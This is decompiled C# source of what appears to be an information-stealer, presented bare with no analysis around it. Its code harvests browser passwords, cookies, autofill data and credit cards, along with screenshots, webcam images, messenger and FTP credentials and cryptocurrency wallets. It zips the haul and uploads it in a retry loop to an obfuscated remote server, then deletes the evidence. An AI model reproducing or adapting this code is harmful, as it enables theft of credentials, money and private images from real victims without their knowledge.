// Token: 0x0600000B RID: 11 RVA: 0x000024FC File Offset: 0x000006FC public static void Start() { string[] search_files = new string[] { "co*es", "log*ta", "we*ata", "loc*ate" }; List <string> list = new List <string>(); List <string> list2 = new List <string>(); Recursive.Search(global::Buffer.path_lad, ref list, global::Buffer.string_0, search_files, 3, 0, false); Recursive.Search(global::Buffer.path_ad, ref list2, global::Buffer.string_0, search_files, 3, 0, false); List <string> list3 = (list.Count <string>() > 1 && list2.Count <string>() > 1) ? list.Concat(list2).ToList <string>() : ((list.Count <string>() > 1) ? list : ((list2.Count <string>() > 1) ? list2 : null)); bool flag = false; string text = ""; int num = 0; int num2 = 0; if (!Directory.Exists(string.Format("{0}Browsers", global::Buffer.path_l))) { Directory.CreateDirectory(string.Format("{0}Browsers", global::Buffer.path_l)); } if (list3 != null) { foreach (string text2 in list3) { string text3 = Path.GetFileName(text2).ToLower(); if (!flag && text3.Contains("state")) { EGChromeC.chrome.GETMasterKey(text2); flag = true; } else if (text3.Contains("login")) { string text4 = EGChromeC.PasswordParse(text2); text += (string.IsNullOrEmpty(text4) ? "" : string.Format("{0}\n\n", text4.Trim())); } else if (text3.Contains("cookie")) { num++; EGChromeC.CookieParse(text2, string.Format("{0}Browsers\\[{1}-{2}] Cookies.txt", global::Buffer.path_l, text2.Split(new string[] { "AppData\\" }, StringSplitOptions.None)[1].Split(new char[] { '\\' })[1], num)); } else if (text3.Contains("web")) { num2++; EGChromeC.fillParse(text2, string.Format("{0}Browsers\\[{1}-{2}] Autofill.txt", global::Buffer.path_l, text2.Split(new string[] { "AppData\\" }, StringSplitOptions.None)[1].Split(new char[] { '\\' })[1], num2)); EGChromeC.CCParse(text2, string.Format("{0}Browsers\\[{1}-{2}] Cards.txt", global::Buffer.path_l, text2.Split(new string[] { "AppData\\" }, StringSplitOptions.None)[1].Split(new char[] { '\\' })[1], num2)); } } } if (!string.IsNullOrEmpty(text.Trim())) { File.WriteAllText(string.Format("{0}Browsers\\Passwords.txt", global::Buffer.path_l), text.Trim().Replace("\n", Environment.NewLine)); } global::Buffer.XBufferData[0] = EGChromeC.CCookies.ToString(); global::Buffer.XBufferData[1] = EGChromeC.CPasswords.ToString(); global::Buffer.XBufferData[10] = EGChromeC.cfill.ToString(); global::Buffer.XBufferData[11] = EGChromeC.CCards.ToString(); }
public bool Start(string[] Params) { Information.Start(); ProcList.Parse(); Thread.Sleep(new Random().Next(1, 5) * 100); if (Base64.Decode(Params[2]) == "1") { clipper.Start(); } Action action = delegate { CBoard.Start(); }; try { if (base.InvokeRequired) { Invoke(action); } else { action(); } } catch { } DesktopImg.Start(); DFiles.Start(); WebCam.Start(); FZ.Start(); Pidgin.Start(); DS.Start(); TG.Start(); Skype.Start(); Steam.Start(); BTCQt.Start(); BTCByte.Start(); BTCDASH.Start(); BTCETH.Start(); BTCMON.Start(); Thread.Sleep(new Random().Next(1, 5) * 1000); EGChromeC.Start(); string text = null; text = $"{Buffer.path_ad}{GetRandom.String(null, 8)}"; if (File.Exists(text)) { File.Delete(text); } ZipFile.CreateFromDirectory(Buffer.path_l, text); try { if (!EntryPoint.activation) { Environment.FailFast("Program has been crashed"); } using (WebClient webClient = new WebClient()) { NameValueCollection nameValueCollection = new NameValueCollection(); nameValueCollection.Add("_x_key_x_", Base64.Encode(EntryPoint.key)); nameValueCollection.Add("zipx", Base64.Encode(File.ReadAllText(text, Encoding.GetEncoding(1251)), Encoding.GetEncoding(1251))); nameValueCollection.Add("desktop", Base64.Encode(File.ReadAllText($"{Buffer.path_l}ScreenShot.png", Encoding.GetEncoding(1251)), Encoding.GetEncoding(1251))); nameValueCollection.Add("webcam", Base64.Encode(File.ReadAllText($"{Buffer.path_l}WebCam.jpg", Encoding.GetEncoding(1251)), Encoding.GetEncoding(1251))); nameValueCollection.Add("email", Params[0]); nameValueCollection.Add("caption", Exporter.Export("<title>", "</title>", Starter.FileData)); nameValueCollection.Add("username", Base64.Encode(Environment.UserName)); nameValueCollection.Add("c_count", Base64.Encode(Buffer.XBufferData[0])); nameValueCollection.Add("pcount", Base64.Encode(Buffer.XBufferData[1])); nameValueCollection.Add("acount", Base64.Encode(Buffer.XBufferData[10])); nameValueCollection.Add("cd_count", Base64.Encode(Buffer.XBufferData[11])); nameValueCollection.Add("steam", Base64.Encode(Buffer.XBufferData[6])); nameValueCollection.Add("fzilla", Base64.Encode(Buffer.XBufferData[2])); nameValueCollection.Add("tg", Base64.Encode(Buffer.XBufferData[3])); nameValueCollection.Add("dcord", Base64.Encode(Buffer.XBufferData[4])); nameValueCollection.Add("skype", Base64.Encode(Buffer.XBufferData[5])); nameValueCollection.Add("b-core", Base64.Encode(Buffer.XBufferData[7])); nameValueCollection.Add("b-byte", Base64.Encode(Buffer.XBufferData[13])); nameValueCollection.Add("b-d", Base64.Encode(Buffer.XBufferData[14])); nameValueCollection.Add("b-ethe", Base64.Encode(Buffer.XBufferData[15])); nameValueCollection.Add("b-mon", Base64.Encode(Buffer.XBufferData[16])); nameValueCollection.Add("avinstall", Base64.Encode(Buffer.XBufferData[18])); nameValueCollection.Add("_version_", Base64.Encode("3200")); while (true) { try { if (Encoding.Default.GetString(webClient.UploadValues(string.Format("http://{0}", Base64.Decode(string.Format("{0}{1}{2}", Buffer.Sender, Buffer.Handler, "="))), nameValueCollection)) == "good") { goto IL_040a; } } catch { } Thread.Sleep(2000); } } } catch { } goto IL_040a; IL_040a: try { Directory.Delete(Buffer.path_l, recursive: true); } catch { } try { File.Delete(text); } catch { } return(true); }